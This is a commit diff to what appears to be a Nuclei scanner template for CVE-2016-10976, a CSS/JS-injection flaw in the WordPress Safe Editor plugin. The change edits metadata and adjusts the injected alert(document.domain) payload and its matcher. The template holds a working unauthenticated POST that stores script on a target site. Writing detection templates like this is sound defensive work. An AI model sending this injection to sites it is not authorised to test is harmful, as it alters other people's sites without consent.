Update CVE-2016-10976.yaml
parent
7c4be44360
commit
fdaa1a9d48
|
@ -1,7 +1,7 @@
|
||||||
id: CVE-2016-10976
|
id: CVE-2016-10976
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: safe-editor <= 1.1 - Unauthenticated CSS/JS-injection
|
name: Safe Editor Plugin < 1.2 - CSS/JS-injection
|
||||||
author: Splint3r7
|
author: Splint3r7
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
|
@ -9,9 +9,9 @@ info:
|
||||||
remediation: |
|
remediation: |
|
||||||
Update to the latest version of safe-editor plugin or apply the patch provided by the vendor.
|
Update to the latest version of safe-editor plugin or apply the patch provided by the vendor.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10976
|
|
||||||
- https://wordpress.org/plugins/safe-editor/#developers
|
- https://wordpress.org/plugins/safe-editor/#developers
|
||||||
- https://github.com/ARPSyndicate/cvemon
|
- https://github.com/ARPSyndicate/cvemon
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10976
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
|
@ -25,7 +25,7 @@ info:
|
||||||
vendor: kodebyraaet
|
vendor: kodebyraaet
|
||||||
product: safe_editor
|
product: safe_editor
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve,cve2016,wordpress,plugin,xss,safeeditor
|
tags: cve,cve2016,wordpress,wp,wp-plugin,xss,safe_editor
|
||||||
|
|
||||||
flow: http(1) && http(2)
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
|
@ -36,7 +36,7 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
action=se_save&type=js&data=alert("document.domain")
|
action=se_save&type=js&data=alert(document.domain)
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
@ -56,5 +56,5 @@ http:
|
||||||
dsl:
|
dsl:
|
||||||
- 'status_code == 200'
|
- 'status_code == 200'
|
||||||
- 'contains(content_type, "text/html")'
|
- 'contains(content_type, "text/html")'
|
||||||
- 'contains_all(body, "alert(\"document.domain\")", "save_edit_js")'
|
- 'contains_all(body, "alert(document.domain)", "save_edit_js")'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
Loading…
Reference in New Issue